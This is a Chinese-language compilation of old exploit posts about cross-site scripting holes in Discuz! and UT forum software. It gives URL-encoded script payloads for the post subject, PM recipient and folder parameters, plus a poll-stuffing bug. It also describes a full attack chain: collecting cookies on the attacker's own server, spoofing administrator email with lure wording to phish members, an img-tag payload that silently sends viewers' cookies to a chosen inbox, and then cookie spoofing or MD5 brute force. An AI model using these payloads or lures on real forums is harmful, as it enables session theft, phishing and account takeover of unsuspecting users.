在discuz！的發(fā)貼、回貼、PM等中的subject都沒(méi)有經(jīng)過(guò)過(guò)濾，所以也可以添加代碼。  
例如  
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22  

效果是首先彈出自己的cookie  
利用方法：把上述代碼放置到img中。  

適用版本：discuz！2.x  
discuz！3.x  
一種利用discuz！2.0漏洞進(jìn)行欺騙獲得cookie的嘗試  

通過(guò)測(cè)試XXXFan論壇的PM功能存在一個(gè)安全漏洞，具體描述如下：  
XXXFan的給某個(gè)會(huì)員發(fā)送悄悄的鏈接如下（假定這個(gè)會(huì)員名字為XXXFan）  
http://XXX/pm.php?action=send&username=XXXFan  

因?yàn)檎搲绦驅(qū)?huì)員名字沒(méi)有進(jìn)行過(guò)濾，而是直接顯示在發(fā)送到欄目中（TO：），所以可以在名字后面加上script代碼。例如  

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document．.cookie)</script><b%20"  

上面的鏈接點(diǎn)擊以后首先彈出的是自己的cookie內(nèi)容。  
當(dāng)然我們可以先在自己的站點(diǎn)上構(gòu)造一個(gè)程序來(lái)收集cookie，類似于  
getcookie.php?cookie=  

但是如何來(lái)誘使會(huì)員點(diǎn)擊呢，如果簡(jiǎn)單的放在論壇上，太容易被識(shí)別。所以可以利用discuz論壇程序的另外一個(gè)功能，“帖子介紹給朋友”功能。  

因?yàn)閐iscuz的這個(gè)功能對(duì)填寫(xiě)的emial地址沒(méi)有進(jìn)行任何過(guò)濾、辨別和模版，可以偽造任何人給別人發(fā)信，安全性很高。利用這個(gè)功能我們就可以偽造ExploitFan的管理員給某個(gè)會(huì)員發(fā)一封信，誘使會(huì)員點(diǎn)擊我們準(zhǔn)備的URL，如果誘使就看自己的手段了，例如可以說(shuō)“論壇正在測(cè)試新功能，請(qǐng)您協(xié)助點(diǎn)擊上面地址，我們會(huì)在后臺(tái)記錄您的點(diǎn)擊在合適的時(shí)間會(huì)給您增加積分以做獎(jiǎng)勵(lì)”等等。  

因?yàn)殒溄拥刂肥荴XXFan的，而且發(fā)信人和郵件地址都是XXXFan的官方地址，所以可信度非常高，而且不會(huì)留下任何把柄。當(dāng)然為了更高的安全性，可以在<script>里的內(nèi)容加密，以進(jìn)一步增加隱蔽性。  

至于得到cookie如何做，可以嘗試cookie欺騙或者是暴力破解MD5密碼  

本方法適用于大部分使用discuz2.0的論壇,至于discuz3.0的利用方法請(qǐng)參與在我以前發(fā)表的discuz！悄悄話漏洞  
【BUG】Discuz!投票的BUG  
投票可以用  
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n  
（n為選項(xiàng)，從0開(kāi)始）  
的方式通過(guò)URL來(lái)直接投票  

但是如果n>最大選項(xiàng)呢，嘻嘻～  
照樣提交成功，不過(guò)增加了一個(gè)標(biāo)題為空的選項(xiàng)  

效果見(jiàn)：  
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc  
（那個(gè)最后的空白的是我剛加的）  

該漏洞存在的版本：  
Discuz!3.X  
Discuz!2.X(可能，沒(méi)有測(cè)試過(guò)）  
Discuz!的代碼漏洞  
這是接著昨天發(fā)現(xiàn)的漏洞所展開(kāi)的，第一發(fā)現(xiàn)者（PK0909)。  

具體的描述就不說(shuō)了，下面是一個(gè)簡(jiǎn)單的測(cè)試代碼。  

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E  

上面的代碼是顯示出自己的cookie  

下面是在某個(gè)比較有名的論壇的測(cè)試代碼，無(wú)論誰(shuí)察看該網(wǎng)頁(yè)都會(huì)把cookie送到指定的會(huì)員短信箱里，隱蔽性很好，就是如果有人引用你的貼，哈哈～這里都會(huì)跑出來(lái)，露餡了  
[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document．.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]  

發(fā)現(xiàn)discuz！UT 跨域站點(diǎn)的腳本漏洞－－短消息篇有關(guān)跨域站點(diǎn)的腳本漏洞，已經(jīng)算是非常平成并普遍的漏洞了。  
有關(guān)具體的消息可以參閱：  
http://www.cert.org/advisories/CA-2000-02.html  
下面針對(duì)Discuz、UT論壇程序的悄悄話部分加以說(shuō)明  

漏洞適應(yīng)版本：  
Discuz1.X  
Discuz!2.0(0609,0820版)  
Discuz!3.X  
UT 1.0  

漏洞描述：  

discuz！給指定會(huì)員發(fā)送悄悄話使用的是類似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的語(yǔ)句，但是name沒(méi)有經(jīng)過(guò)過(guò)濾直接顯示在發(fā)送短消息的頁(yè)面中，這就給偷cookie或者更嚴(yán)重的破壞打開(kāi)了方便之門(mén)。  

Discuz!3.X已經(jīng)改為http://XXX.net/pm.php?action=send&uid=XXXX類似的語(yǔ)句，避免了這個(gè)漏洞，但是在選擇短信文件夾的時(shí)候卻沒(méi)有經(jīng)過(guò)過(guò)濾。同樣產(chǎn)生了上面的漏洞  


例  
http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document．.cookie)%3C/script%3E%3Cb%22[/url]  
，上面的例子是顯示自己的cookie。（針對(duì)Discuz!1.X Discuz!2.X)  

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22  
顯示自己的cookie。（針對(duì)Discuz!3.X)  

UT雖然在主題上經(jīng)過(guò)了過(guò)濾，也就是說(shuō)把%27轉(zhuǎn)換為'；但是其收件人卻沒(méi)有過(guò)濾，所以同樣有類似的漏洞。例子略。(在不同的UT論壇上發(fā)現(xiàn)其代碼不盡相同，但是總的來(lái)說(shuō)都有類似的漏洞）  


危害度：中弱  

預(yù)防辦法：  
點(diǎn)擊超級(jí)鏈接時(shí)請(qǐng)注意其真實(shí)內(nèi)容。更多的安全補(bǔ)丁請(qǐng)密切關(guān)注官方論壇。 

最新評(píng)論